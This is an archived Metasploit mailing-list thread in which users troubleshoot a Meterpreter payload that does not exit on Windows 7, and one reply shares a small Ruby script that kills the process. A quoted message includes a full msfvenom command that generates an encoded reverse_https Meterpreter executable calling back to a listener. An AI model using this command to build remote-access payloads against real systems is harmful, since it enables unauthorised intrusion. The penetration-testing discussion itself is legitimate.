Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: meterpreter exit problem..

From: Jason Hawks <jason.hawks0 () gmail com>
Date: Fri, 24 Feb 2012 10:00:23 +0100
Hi,

It seems that SessionCommunicationTimeout and SessionExpirationTimeout have
no effect either. The EXE is still running even after the given timeouts.

As a dirty workaround, I use a tiny post script to "kill" the process.

file:

scripts/meterpreter/killme.rb

content:

print_status(".. Killing Meterpreter process")
pid = session.sys.process.getpid()
session.sys.process.kill(pid)


Uage:

meterpreter > run killme
[*] .. Killing Meterpreter process
====> Since the communication is broken, Hit CTRL-C, then detach the console
meterpreter > detach


(ps: http://dev.metasploit.com/redmine/issues/5945)

Jason


2011/12/3 Drforbin <drforbin6 () gmail com>


Hi all,

   I'm having the same problem as Jason Hawk's posting (see quote)
I have tried setting multi/handler to process etc. nothing seems to work.
as Jason points out, and I have confirmed everything works fine  on window
xp,
it is windows 7 which gives some problems.


Please help if anyone can..


Thanxs

Merlyn

drforbin





"
Hello everyone,

I have an issue with the "Exit" command during a meterpreter session.
The payload (EXE) don't exit on the victim computer.

- On Windows 7 (x86/x64), I have tested reverse_https, revese_tcp and
bind_tcp with exitfunc=process/thread/seh . None of these payloads
exit. I must kill them manually.
- On Windows XP, only reverse_https have the issue.

I generate the payloads by using the following syntax:

./msfvenom -e x86/shikata_ga_nai -f exe -p
windows/meterpreter/reverse_**https LHOST=192.168.1.103 LPORT=443
EXITFUNC=XXXX > /tmp/reverse_https_192.168.1.**103_443_exitfunc_XXXX.exe


Current MSF version:
      =[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 757 exploits - 402 auxiliary - 114 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
      =[ svn r14193 updated today (2011.11.08)

$ ruby -v
ruby 1.9.2p290 (2011-07-09 revision 32553) [i686-linux]

Am I doing something wrong ?
Any advice/workaround is welcome.

Thank you very much,

Jason

"
______________________________**_________________
https://mail.metasploit.com/**mailman/listinfo/framework<https://mail.metasploit.com/mailman/listinfo/framework>


_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: